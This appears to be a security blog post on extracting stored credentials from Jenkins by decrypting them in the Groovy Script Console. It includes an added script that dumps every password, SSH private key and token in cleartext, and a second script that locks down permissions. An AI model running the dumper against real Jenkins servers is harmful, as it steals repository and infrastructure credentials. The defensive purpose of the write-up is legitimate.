The Security of DevSecOps - Jenkins
Jenkins is an open source automation server that is a frequent target for attackers, and it is also genuinely useful when used as intended: it can automatically run test cases against a code base as changes are committed to a repository and report the results.
So why attack Jenkins? Beyond the fact that it is typically configured to run as SYSTEM on Windows or root on Linux, it also ships with a "Script Console" where Groovy scripts, and through them commands on the underlying operating system, can be run from within Jenkins.
We wanted a different look at Jenkins, though. For Jenkins to do its job, it has to have access to the source code it builds, right? That means the credentials for the repository are stored somewhere Jenkins can read them. We wanted to find out where.
Navigate to the Global Credentials section of Jenkins and open a stored credential: the page shows a redacted (masked) version of the password.
However, in a simple 101 trick, why not review the page source? If you look at the source of that page, the masked password field is populated not with the password itself but with a long base64 string wrapped in curly braces.
That string is actually the encrypted form of the password. The next piece of the puzzle is how to decrypt it to recover the cleartext. Remember the Script Console we talked about earlier? It comes into play again here: Jenkins has to be able to decrypt the value itself, since the keys live on the Jenkins controller, so a script running inside Jenkins can call the same routine (hudson.util.Secret.decrypt()) and print the plaintext.
Running that decryption routine in the Groovy console returns the plaintext password. The same approach applies to SSH private keys stored in Jenkins, which are protected with the same mechanism.
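The following Script Console script is an added example, not code from the original post. It enumerates every credential Jenkins holds, shows the encrypted "{...}" form of each password (the same value that appears in the page source) and decrypts it with hudson.util.Secret.decrypt(), and it also dumps SSH private keys and secret-text credentials. It assumes the Credentials, SSH Credentials and Plain Credentials plugins are installed, which is the case on nearly every Jenkins instance that stores SCM credentials.

```groovy
// Added example (not from the original post). Paste into Manage Jenkins -> Script Console.
// Assumes the Credentials, SSH Credentials and Plain Credentials plugins are present.
import jenkins.model.Jenkins
import hudson.security.ACL
import hudson.util.Secret
import com.cloudbees.plugins.credentials.CredentialsProvider
import com.cloudbees.plugins.credentials.common.StandardCredentials
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials
import com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey
import org.jenkinsci.plugins.plaincredentials.StringCredentials

// Every credential visible from the root item group, looked up with SYSTEM
// authority, which is what the Script Console already runs as.
def creds = CredentialsProvider.lookupCredentials(
        StandardCredentials, Jenkins.instance, ACL.SYSTEM, [])

creds.each { c ->
    println "== ${c.id} (${c.class.simpleName})"
    if (c instanceof StandardUsernamePasswordCredentials) {
        // getEncryptedValue() is the "{...}" blob found in the page source;
        // Secret.decrypt() is the routine the post refers to. The round trip
        // shows that nothing outside Jenkins is needed to recover the cleartext.
        String blob = c.password.encryptedValue
        println "  encrypted: ${blob}"
        println "  user:      ${c.username}"
        println "  password:  ${Secret.decrypt(blob)?.plainText}"
    } else if (c instanceof BasicSSHUserPrivateKey) {
        // Private keys are stored the same way; the passphrase, if any, is a Secret too.
        println "  user:       ${c.username}"
        println "  passphrase: ${c.passphrase?.plainText}"
        c.privateKeys.each { key -> println key }
    } else if (c instanceof StringCredentials) {
        // "Secret text" credentials (API tokens etc.) are Secrets as well.
        println "  secret: ${c.secret.plainText}"
    }
}
```

Because the console runs inside the Jenkins JVM, the script never has to touch $JENKINS_HOME/secrets directly; the same lookup also works from a Pipeline job's Groovy if sandbox restrictions are disabled or approved, which is why Script Console access and job-configuration access deserve the same level of protection.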
When Jenkins is deployed this way, very little is usually done to protect the installation. When we find Jenkins on assessments it is typically configured with a username and password, but nothing beyond that. Jenkins DOES support role-based permissions and you CAN lock an installation down: remove Script Console access from every account except the administrator, and deny ordinary accounts the Credentials view permission so they cannot reach the Global Credentials page and the encrypted authentication data it exposes.
FortyNorth Security contacted the Jenkins development team to warn them of the issue prior to giving the DevSecOps talk in October. They stated that they do not consider it a vulnerability, because an attacker with that level of access could likely find another method of reaching the data anyway.
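One way to apply the lock-down described above, as an added example rather than configuration from the original post, is a one-off Script Console script that installs a matrix authorization strategy. It assumes the bundled Matrix Authorization Strategy plugin is present and uses hypothetical user IDs (admin, alice, bob); adjust them to the accounts in your security realm before running it, or you will lock yourself out.

```groovy
// Added example (not from the original post). Requires the Matrix Authorization
// Strategy plugin. User IDs below are hypothetical; replace them with real accounts.
import jenkins.model.Jenkins
import hudson.model.Item
import hudson.security.GlobalMatrixAuthorizationStrategy
import com.cloudbees.plugins.credentials.CredentialsProvider

def j = Jenkins.instance
def strategy = new GlobalMatrixAuthorizationStrategy()

// The administrator keeps everything, including the Script Console. On older
// releases Overall/RunScripts is a separate permission that Administer implies;
// on current releases the Script Console simply requires Overall/Administer.
strategy.add(Jenkins.ADMINISTER, 'admin')

// Ordinary users can log in, see jobs and start builds, nothing more.
['alice', 'bob'].each { sid ->
    strategy.add(Jenkins.READ, sid)
    strategy.add(Item.READ, sid)
    strategy.add(Item.BUILD, sid)
}

// Deliberately NOT granted to non-admins:
//   Jenkins.ADMINISTER            -> Script Console, hudson.util.Secret.decrypt()
//   CredentialsProvider.VIEW      -> Global Credentials pages whose source carries the "{...}" blobs
//   Item.CONFIGURE, Item.EXTENDED_READ -> job config.xml, which can also embed encrypted secrets
//   Item.CREATE                   -> a new job whose build step runs arbitrary commands

j.setAuthorizationStrategy(strategy)
j.save()
```

After running it, verify the result as a non-admin user: Manage Jenkins should no longer show the Script Console entry, and /credentials/ should return a permission error. Treat anyone who still holds Overall/Administer as able to read every stored credential in cleartext, which is exactly the position the Jenkins team took when declining to call this a vulnerability.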